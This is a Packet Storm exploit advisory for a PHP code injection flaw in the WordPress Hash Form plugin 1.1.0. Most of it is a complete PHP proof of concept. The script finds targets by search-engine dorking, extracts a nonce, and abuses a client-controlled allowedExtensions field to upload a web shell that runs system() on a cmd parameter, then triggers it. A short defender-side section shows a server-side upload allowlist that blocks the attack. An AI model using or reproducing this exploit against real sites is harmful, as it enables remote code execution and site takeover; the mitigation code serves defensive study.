WordPress Hash Form 1.1.0 Code Injection

WordPress Hash Form plugin version 1.1.0 suffers from a PHP code injection vulnerability.

Packet Storm

=============================================================================================================================================
| # Title : WordPress Hash Form 1.1.0 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://plugintests.com/plugins/wporg/hash-form/latest |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] The following PHP code uploads a shell file from an external link.

[+] Line 117: set your target.

[+] Line 111: set your commands.

[+] Save the code as poc.php.

[+] Usage: php poc.php

[+] Payload:

<?php

class WordPressHashFormRCE {
    private $target_url;
    private $nonce;

    public function __construct($target_url) {
        $this->target_url = $target_url;
    }

    public function check() {
        if (!$this->isWordPressOnline()) {
            return 'WordPress does not appear to be online.';
        }

        $plugin_version = $this->checkPluginVersion('hash-form', '1.1.1');

        if ($plugin_version === null) {
            return 'Hash Form plugin does not appear to be installed.';
        }

        if ($plugin_version === false) {
            return 'Hash Form plugin is installed but the version is unknown.';
        }

        if ($plugin_version !== '1.1.0') {
            return "Hash Form plugin is version: $plugin_version, which is not vulnerable.";
        }

        return "Detected Hash Form plugin version: $plugin_version";
    }

    public function exploit() {
        echo "Attempting to retrieve nonce from the target...\n";
        $this->nonce = $this->getNonce();

        if (!$this->nonce) {
            die('Failed to retrieve the nonce necessary for file upload.');
        }

        echo "Nonce retrieved: {$this->nonce}\n";
        echo "Uploading PHP payload using the retrieved nonce...\n";

        $file_url = $this->uploadPhpFile();
        if (!$file_url) {
            die('Failed to upload the PHP payload. Check file permissions and server settings.');
        }

        echo "PHP payload uploaded successfully to $file_url\n";
        $this->triggerPayload($file_url);
    }

    private function isWordPressOnline() {
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');
        return $response !== false;
    }

    private function checkPluginVersion($plugin_name, $version) {
        $response = $this->sendRequest('GET', "/wp-admin/admin-ajax.php?action=hashform_preview&form=1");
        if ($response === false) return null;

        preg_match('/"version":"([^"]+)"/', $response, $matches);
        return $matches[1] ?? false;  // return the version or false if not found
    }

    private function getNonce() {
        $response = $this->sendRequest('GET', '/wp-admin/admin-ajax.php?action=hashform_preview&form=1');
        if ($response === false) return null;

        preg_match('/"ajax_nounce":"([a-f0-9]+)"/', $response, $matches);
        return $matches[1] ?? null;
    }

    private function uploadPhpFile() {
        $file_content = $this->createPayload();
        $file_name = strtolower(bin2hex(random_bytes(4))) . '.php';

        $response = $this->sendRequest('POST', '/wp-admin/admin-ajax.php', [
            'action' => 'hashform_file_upload_action',
            'file_uploader_nonce' => $this->nonce,
            'allowedExtensions[0]' => 'php',
            'sizeLimit' => 1048576,
            'qqfile' => $file_name,
            'data' => $file_content
        ]);

        $json_response = json_decode($response, true);
        return $json_response['url'] ?? null;
    }

    private function triggerPayload($url) {
        echo "Triggering the payload...\n";
        $this->sendRequest('GET', $url);
    }

    private function sendRequest($method, $uri, $data = []) {
        $url = $this->target_url . $uri;
        $options = [
            'http' => [
                'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
                'method' => $method,
                'content' => http_build_query($data),
            ],
        ];
        $context = stream_context_create($options);
        return @file_get_contents($url, false, $context);
    }

    private function createPayload() {
        // You can define your payload logic here; for now, we return a simple payload
        $payload = "<?php\n if(isset(\$_GET['cmd'])) { system(\$_GET['cmd']); }\n ?>";
        return base64_encode($payload);
    }
}

// Using the module
$target_url = 'http://target-wordpress-site.com';
$exploit = new WordPressHashFormRCE($target_url);

// Check for the vulnerability
echo $exploit->check() . "\n";

// Execute the exploit
$exploit->exploit();
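The upload above goes through only because the handler honours the client-supplied allowedExtensions[] list that the PoC sets to "php". As an added, defender-side example that is not part of this advisory and not the Hash Form plugin's own code, the stand-alone PHP below shows the server-side check such a handler needs: the client list is ignored, a fixed allowlist decides, and executable extensions are refused in any position of the name. The constant and function names are assumptions made for this example.

```php
<?php
// Added example, not the Hash Form plugin's code: a server-side name check for
// an upload handler that, like the one the PoC posts to, receives a
// client-supplied allowedExtensions[] list. That list is ignored on purpose;
// only the fixed allowlist below decides what may be stored.

const UPLOAD_ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

// Extensions a typical web server hands to an interpreter or reads as
// configuration. Refused in any position, so "shell.php.jpg" fails as well.
const UPLOAD_EXECUTABLE_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phar', 'phps', 'pht', 'htaccess',
];

function is_safe_upload_name(string $client_name, array $client_allowed = []): bool
{
    unset($client_allowed);                      // the client never widens the policy
    $name = basename(trim($client_name));        // drop any path component
    if ($name === '' || strpos($name, "\0") !== false) {
        return false;
    }
    $parts = explode('.', strtolower($name));
    if (count($parts) < 2) {
        return false;                            // no extension at all
    }
    array_shift($parts);                         // the base name is not an extension
    foreach ($parts as $ext) {
        if (in_array($ext, UPLOAD_EXECUTABLE_EXTENSIONS, true)) {
            return false;
        }
    }
    return in_array(end($parts), UPLOAD_ALLOWED_EXTENSIONS, true);
}

function storage_name_for(string $client_name): string
{
    // The client-chosen name never reaches disk; only the vetted extension is kept.
    $ext = strtolower(pathinfo(basename($client_name), PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed inputs: the PoC's random 8-hex-char .php name, a double
// extension, a server config file and a benign image, each sent with the
// permissive allowedExtensions[] value the PoC uses.
foreach (['a1b2c3d4.php', 'shell.php.jpg', '.htaccess', 'photo.png'] as $n) {
    $ok = is_safe_upload_name($n, ['php']);
    printf("%-14s %s\n", $n, $ok ? 'accepted as ' . storage_name_for($n) : 'rejected');
}
```

Of the four constructed names only photo.png is accepted; the other three are rejected regardless of what the request claims in allowedExtensions[].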

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
